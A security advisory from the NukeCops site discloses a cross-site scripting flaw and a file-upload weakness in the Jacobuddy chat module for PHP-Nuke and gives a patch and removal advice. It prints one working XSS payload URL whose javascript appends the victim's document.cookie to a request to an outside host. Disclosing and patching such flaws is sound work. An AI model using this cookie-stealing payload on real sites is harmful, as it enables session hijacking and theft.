NukeCops - Jacobuddy Cross Site Scripting (XSS) And Upload Exploit

You are missing our premiere tool bar navigation system! Register and use it for FREE!

Create an account

• Home • Downloads • Gallery • Your Account • Forums •

Readme First

- Readme First! -
Read and follow the rules, otherwise your posts will be closed

Modules

· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account

Who's Online

There are currently, 377 guest(s) and 0 member(s) that are online.

You are Anonymous user. You can register for free by clicking here

Security: Jacobuddy Cross Site Scripting (XSS) And Upload Exploit

Officially Released For Publication by Computer Cops.

Jacobuddy a Javascript Real Time Chat Module is an independent add-on for the open source GNU/GPL content management system PHP-Nuke. Computer Cops has discovered that Jacobuddy version 3.0 is vulnerable to Cross Site Scripting (XSS) and file system manipulation. It is our belief to contact the author prior to a public posting, but in this case we have supplied a fix for both vulnerabilities of this addon.

The following URL is a sample of how Jacobuddy can be seeded with a XSS exploit within the message body:

http://www.laudanski.com/"style="background-image:url(javascript:nurl='http://www.laudanski.com/j.cgi?';nurl=nurl+document.cookie;document.URL=nurl)

The current unpatched version will automatically redirect the receiver's pop-up Jacobuddy message to another site grabbing their cookie information from the attacked site.

The patch for this is applied to the buddy.php file:

In the following function block:

function send($to, $to_userid, $message, $subject) {

Add the following line after the global statement:

$message = htmlspecialchars(strip_tags($message));

The next vulnerability is the infamous dcc file transfer within the buddy.php file.

Any file uploaded into the system can stay on the system. A malicious script can be generated to grab vital file system data like the php-nuke config.php file and turned into a text file for the malicious uploader to access. Computer Cops highly advises that the entire dcc function be removed from the file in addition to the dcc case block and $who_online clause for the dcc link.

Computer Cops will make an attempt to contact the vendor with this information.

Posted on Saturday, March 01 @ 23:44:02 CET by Zhen-Xjell

Most read story about Security:
PHP-Nuke admin.php security hole - PATCHED

Article Rating

Average Score: 5
Votes: 1

Options

Printer Friendly Page

Send to a Friend

The comments are owned by the poster. We aren't responsible for their content.

No Comments Allowed for Anonymous, please register

Powered by TOGETHER TEAM srl ITALY http://www.togetherteam.it - DONDELEO E-COMMERCE http://www.DonDeLeo.com - TUTTISU E-COMMERCE http://www.tuttisu.it
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.127 Seconds - 144 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)

:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::